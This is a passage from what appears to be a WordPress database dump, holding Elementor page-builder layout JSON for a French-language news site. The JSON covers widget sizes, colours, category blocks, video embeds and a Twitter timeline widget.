"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2375,763,'_elementor_version','0.4'),(2376,763,'_elementor_css','a:3:{s:4:\"time\";i:1509370612;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2377,764,'_elementor_edit_mode','builder');
INSERT INTO `wpfy_postmeta` VALUES (2378,764,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#bf0204\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#f